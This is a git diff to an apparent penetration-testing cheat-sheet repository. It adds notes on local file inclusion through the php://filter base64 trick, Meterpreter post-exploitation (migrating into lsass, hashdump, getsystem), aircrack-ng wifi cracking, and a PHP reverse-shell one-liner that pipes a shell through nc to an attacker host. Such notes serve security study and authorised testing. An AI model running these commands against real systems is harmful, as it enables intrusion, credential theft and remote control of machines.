diff --git a/exploit/web/local_file_inclusion.md b/exploit/web/local_file_inclusion.md
index 83be44f..0d04667 100644
--- a/exploit/web/local_file_inclusion.md
+++ b/exploit/web/local_file_inclusion.md
@@ -30,4 +30,9 @@ curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log' -H 'Host:
     ```HTTP
     curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../'
     ```
+### Base64 Encoding via PHP
+* Circumvent filter via encoding local files included ins a GET parameter value
+```http
+curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=<fileOnServer>.php
+```
 
diff --git a/metasploit.md b/metasploit.md
index 2c3a0bd..4d8c381 100644
--- a/metasploit.md
+++ b/metasploit.md
@@ -66,9 +66,30 @@ use multi/http/apache_mod_cgi_bash_env_exec
 ```
 
 ## Post Exploitation
+* `load kiwi`
+* `load python`
 * Windows
-    * `load kiwi`
-    * `hashdump`
+    * list SAM database
+    ```sh
+    migrate <lsass.exe-PID>
+    hashdump
+    ```
+    * enum shares
+    ```sh
+    post/windows/gather/enum_shares
+    ```
 * Linux
     * `use post/linux/gather/hashdump`
 
+## Other Meterpreter stuff
+* Staged and in disguise running as another servicename
+```
+getpid
+ps
+``` 
+* Attempt to elevate privileges
+```sh
+getsystem
+```
+* Use `multi/handler` or exploit and get an overview via `show payloads`
+* UserID via `getuid`
diff --git a/misc/wifi/airmon-ng.md b/misc/wifi/airmon-ng.md
new file mode 100644
index 0000000..36d105f
--- /dev/null
+++ b/misc/wifi/airmon-ng.md
@@ -0,0 +1,20 @@
+# aircrack-ng
+
+## airmon-ng
+
+* Monitor on interface
+```sh
+airmon-ng start <interface>
+```
+
+## airodump-ng
+* Capture traffic
+
+
+## aircrack-ng
+* Use captured network traffic to crack
+* Specify targets via common options 
+* Create hashcap files as `HCCAPX` or `HCCAP`
+```sh
+aircrack-ng -w <wordlist> -b <bssidFromCapture> -j <outputHashcatFile> <INPUTFILE>
+```
diff --git a/reverse_shells/docs/shell_collection.md b/reverse_shells/docs/shell_collection.md
index d22380b..90d7969 100644
--- a/reverse_shells/docs/shell_collection.md
+++ b/reverse_shells/docs/shell_collection.md
@@ -29,3 +29,9 @@ python -c 'import pty; pty.spawn("/bin/bash")'
 * `ssh-keygen`
 * copy priv key and `chmod 600`
 * `cat id_rsa.pub > authorized_keys` on target
+
+## As Code
+### PHP
+```sh
+<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker-IP> <attacker-PORT> > /tmp/f') ?>
+```